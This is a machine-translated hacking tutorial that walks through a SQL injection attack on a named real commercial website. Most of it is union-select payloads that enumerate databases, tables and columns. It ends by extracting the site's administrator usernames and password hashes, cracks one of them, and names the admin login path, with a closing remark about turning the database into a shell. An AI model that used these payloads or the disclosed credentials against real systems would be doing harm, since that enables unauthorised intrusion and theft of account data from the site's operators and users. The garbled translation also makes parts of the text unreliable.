Mengniu friendship Detection

By radish header upx8.com

Target main site:Http://www.mengniu360.com

1. You need to find the injection point and hand it to jsky.

Find the injection point http://www.mengniu360.com/news_view.php? Id = 3
Then, let's take a look. 'Return error and 1 = 1 and 1 = 3. More sure there is an injection vulnerability!
 
First, let's try the field-free brute-force sensitive information.
+ And + 1 = 2 + union + all + select + user ()

No useful vulnerabilities have been found !!
Before brute-force cracking, we must know whether the mysql website has high permissions and is writable. If it can be written, we can directly write the Trojan.
+ And + 1 = 2 (select + count (*) + from + mysql. user)> 0 if the failure proves that the write is not allowed, the permission is not high.
You are not authorized to return page errors !!

1. Guess the length of the field !! Use the order by statement
It is estimated that the field length is 7.
2. and 1 = 2 union select query statement !!! Available number @@
Construct a statement
And 1 = 2 union select 1, 2, 4, 5, 6, 7-
Available number 2.3.7
 
3. Let's take a look at its user information, database information, and version information !!!
The result is as follows:

Through these, we can know that this website can be cracked.
We know that MySQL and later versions have a system database named information_schema, which stores all the tables and fields of the database.
The database name is stored in SCHEMATA of the information-schema database.

And + 1 = 2 + union + select + 1, 2, 3, 4, 5, 6, 7 + from + information_schema.SCHEMATA + LIMIT + 0, 1
This method can also be cracked, but the speed is too slow @@
We can use another method.
Construction statement: and 1 = 2 union select 1, group_concat (schema_name), 3, 4, 5, 6, 7 from information_schema.schemata-
All databases are listed as follows.
 

Information_schema, 0914 test, 0915 test, Snowflakes, SnowflakesData, admin, commentDb, cuteflow, dbtest, dedecmsv56utf,

Drupal, guiyiqing, igo, inoherb, java_bridge1, jisko, joomla, joomla1, lgtest, limesurvey, limesurvey186, ljqsns, lottery, mengniu,

Microblog, mnst, mtee, mysql, philipssns, philipssnsmop, phpbb3, phpcms, piwik, ppmate, puma, skoda_test_1, skodasns,

Skodasn
I rely on so many database names to check this method for multiple blocks !! I can report more !!
5. Use the method of the above brute-force database to modify the statement and kill the table name.
Construction statement: and 1 = 2 union select 1, group_concat (table_name), 3, 4, 5, 6, 7 from information_schema.tables where table_schema = database ()-
All the statements are displayed !!!
 

Charge, charge_status, images, invition, luckprize, manager, news, prize, users
Find the table that we think has an account and password
Let's check the manager table.
Use our Conversion Tool xiaokui to convert the manager into a hexadecimal value. The result is 0x6D616E61676572.
 

Construction statement and 1 = 2 union select 1, group_concat (column_name), 3, 4, 5, 6, 7 from information_schema.columns where table_name = 0x6D616E61676572-
Success!
 
Admin_id, adminname, password, ip, createtime
Obviously, our account and password exist.
Manager table
7. The password will pop up below
And 1 = 2 union select 1, adminname, password, 4, 5, 6, 7 + from + manager

+ And + 1 = 2 + union + select + 1, group_concat (0x5B78786F6F5D, adminname), group_concat (0x5B78786F6F5D, password), 4,5, 6,7 + from + manager
The password of the account used is displayed successfully @@
 

Account [xxoo] 88, [xxoo] mengniu
Password [xxoo] d41d8cd98f00b204e9800998ecf8427e, [xxoo] cbc7b488901ea30cc451c5d2e3c074ce
After the password is disclosed, the mengniu password is mengniu.

8. The background has been found.
Address http://www.mengniu360.com/admin/login.php
 
 

However, I cannot log on to the background. In my personal experience, it seems that I can only log on with a local account! Can someone take it ??
This is the only tutorial!
 
------------------

/Data/web/www.xxxxx.com/config.inc.php

Import the database to shell